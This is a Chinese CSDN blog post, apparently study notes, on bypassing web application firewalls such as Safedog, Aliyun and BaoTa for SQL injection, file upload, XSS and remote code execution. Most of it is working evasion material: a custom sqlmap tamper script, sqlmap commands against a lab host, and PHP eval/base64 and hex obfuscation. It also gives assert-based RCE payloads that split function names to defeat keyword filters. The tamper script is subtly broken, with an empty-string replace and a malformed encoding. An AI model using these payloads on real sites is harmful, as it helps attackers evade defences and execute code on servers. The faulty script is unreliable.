WAF绕过-漏洞利用之注入上传跨站等绕过

最新推荐文章于 2024-02-08 14:30:00 发布
最新推荐文章于 2024-02-08 14:30:00 发布
阅读量2.2k 收藏 6
点赞数 1
文章标签: python javascript 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441315/article/details/120586197
版权

WAF绕过-漏洞利用之注入上传跨站等绕过

在这里插入图片描述

SQL 注入

如需 sqlmap 注入 修改 us 头及加入代理防 CC 拦截自写 tamper 模块

安全狗:参考之前 payload(现在不行了)

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH

def tamper(payload, **kwargs):
    retVal = ""

    if payload:
        payload = payload.replace("union", "%23a%0union")
        payload = payload.replace("select", "/*!44534select*/")
        payload = payload.replace("%20", "%23a%0a")
        payload = payload.replace("",  "%23a%0a")
        payload = payload.replace("database()","database%23a%0a()")
    return payload

在这里插入图片描述
sqlmap.py 利用

python sqlmap.py -u "http://192.168.224.130/xscj/pikachu-master/vul/sqli/sqli_str.php?name=1%22&submit=%E6%9F%A5%E8%AF%A2" --random-agent --tamper=ridog.py

Aliyun:基本修改指纹即可
宝塔:匹配关键字外加/*等
sqlmap --proxy=“http://127.0.0.1:8080” --tamper=“waf.py” --random-agent

文件上传

1.php 截断 参考前面上传 waf 绕过 payload

XSS 跨站

利用 XSStrike 绕过 加上–timeout 或–proxy 绕过 cc

其他集合

RCE:
pikachu靶场,宝塔拦截日志
在这里插入图片描述
采用base64绕过:
在这里插入图片描述
绕过的一种方法:限制Base64,可以用16进制,也可以拼接替换。
加密解密绕过:

hex

PHP pack() 函数
字符串转16进制

<?php
$hex='706870696e666f28293b';
echo(pack("H*",$hex));
?>

在这里插入图片描述

base64

<?php
eval(base64_decode('cGhwaW5mbygpOw=='));
?>

在这里插入图片描述

变量覆盖、拼接,替换函数

宝塔拦截参数base64_decode()

txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4

如果连assert()也过滤了,变量继续覆盖加拼接

txt=$x='asse';$xx='rt';$xxx=$x.$xx;$y=str_replace('x','','pxhpxinxfo()');$xxx($y);&submit=%E6%8F%90%E4%BA%A4

可以get+post混合使用
在这里插入图片描述

文件包含

没什么好说的就这几种
…\ …/ …\等

硫酸超
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
1、逻辑问题 2、性能问题 3、白名单
WEB漏洞-XSS跨站WAF绕过
xhscxj的博客
01-25 839
什么是httponly 如果你在cookie中设置了httponly熟悉,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击
WAF绕过小技巧
tomyyyyy
09-22 6597
一、WAF绕过 1、脏数据绕过 即传入一段长数据使waf失效,从而实现绕过waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。 例如,当发现某网站存在一个反序列化漏洞时,但是无回显,被waf拦截了 利用脏数据插入5000个x字符,可以成功绕过。 2、高并发绕过 对请求进行并发,攻击请求会被负载均衡调度到不同节点,导致某些请求绕过waf的拦截 3、http参数污染...
聊一聊SQL注入常用绕WAF小技巧
最新发布
Javachichi的博客
02-08 1101
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
常见的WAF绕过方法
武天旭的博客
02-11 1万+
本篇文章通过网络架构层、HTTP协议层、第三方应用层讲解了绕过WAF的常见方法 一、网络架构层 一般通过域名指向云WAF地址后反向实现代理,找到这些公司的服务器的真实IP即可实现绕过。 具体方法如下: 1、查找相关的二级域名及同一域名注册者的其他域名解析记录。 2、通过查看邮件MX解析记录来发现真实服务器的IP记录或网段,例如: windows可以执行命令: nslookup -qt=mx baidu.com Linux可以执行如下命令来查看baidu.com域名的MX解析...
漏洞利用篇(上)
m0_57929980的博客
06-16 6349
漏洞利用篇:介绍漏洞利用的基本概念及示例,主要讲解Shellcode的编写与编码
(23)【漏洞利用】【原理、利用过程】中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞
03-16 7722
实战为本,理论先行
ByPassWAF&注入-漏洞银行大咖面对面11-倾旋
07-31
ByPassWAF&注入-漏洞银行大咖面对面11-倾旋
基于正则类sql注入防御的绕过技巧.pdf
08-07
Range之前发现了xx狗的...分别讲了注释类绕过和长度类绕过,另外也说明了各类waf通常对POST注入默认不开启,通过默认配置的遗漏来绕过注入防御。并展示了拒绝服务漏洞的视频,以及挖掘思路。 简介 注释类 长度类 终极版
TSRC挑战赛:WAF之SQL注入绕过挑战实录.pdf
09-18
TSRC挑战赛:WAF之SQL注入绕过挑战实录 红蓝对抗 安全架构 大数据 金融安全 漏洞挖掘
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
这个脚本合集给出了各种数据库对应的绕waf脚本名称,方便针对...它能够帮助你发现并利用应用程序中的SQL注入漏洞,及时修复这些漏洞,确保你的数据安全。所以,如果你想确保你的应用程序免受潜在威胁的影响,那么SQLMA
网络安全各类WAF绕过技巧
zxcvbnmasdflzl的博客
05-24 2531
即传入一段长数据使waf失效,从而实现绕过waf。某些waf处理POST的数据时,只会检测开头的8K,后面选择全部放过。
WAF介绍及常见绕过方法
qq_41320827的博客
02-20 8408
一、WAF简介 WAF(WebApplicationFirewall)也称:网站应用级入侵防御系统,是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 1.工作原理 对web应用程序客户端发出的流量进行内容检测和验证,检测其安全性与合法性,来屏蔽常见的网站漏洞攻击,如SQL注入,XML注入、XSS等。 2.WAF分类 软件型WAF 以软件形式装在所保护的服务器...
WAF绕过
Z_l123的博客
02-19 1843
实验原理 WAF (Web Application Firewall)的中文名称叫做"Web应用防火墙",通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止SQL注入,跨站脚本(XSS)、文件包含和安全配置错误等漏洞引发的攻击。 作为攻击者来说,常见的绕过WAF的方式包括大小写变换、编码、重写、巧用注释符、巧用盲注、同功能函数替换等。其中,重写适用于WAF只过滤一次敏感字的情况。比如 WAF过滤敏感字union,但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执行
xss绕过,payload全集
热门推荐
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.csdn.net/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
安全狗的绕过
alien0011的博客
06-09 3408
安全狗的绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
漏洞利用技术讲解,漏洞分析与利用技巧
白帽子凯哥聊黑客
12-07 1319
在网络安全领域,我经常会被问到关于漏洞利用的问题。作为一个长期从事网络安全研究的小哥哥,我明白漏洞利用的重要性,将通过这篇文章分享给大家。
生命在于学习——SQL注入绕过
易水哲的博客
08-17 7768
SQL注入绕过技术已经是一个老生常淡的内容了
WAF绕过-漏洞发现篇-漏洞扫描工具绕过WAF
xiaoheizi的博客
08-04 717
3.来到网站:https://blog.csdn.net/qq_26230421/article/details/99052337 获取各大搜索引擎的蜘蛛UA头,我这里使用的是百度蜘蛛UA:Mozilla/5.0 (compatible;硬件型WAF以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护,是最为传统的WAF型态,在受访企业中部署占比为35.2%。这种类型的WAF采用纯软件的方式实现,特点是安装简单,容易使用,成本低。
sql注入绕过waf
09-03
绕过WAF(Web应用程序防火墙)可以增加攻击成功的几率,但我无法提供关于如何绕过WAF的具体指导或支持任何非法行为。 然而,我可以提供一些有助于避免SQL注入攻击的一般性建议: 1. 使用参数化查询或预编译语句:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值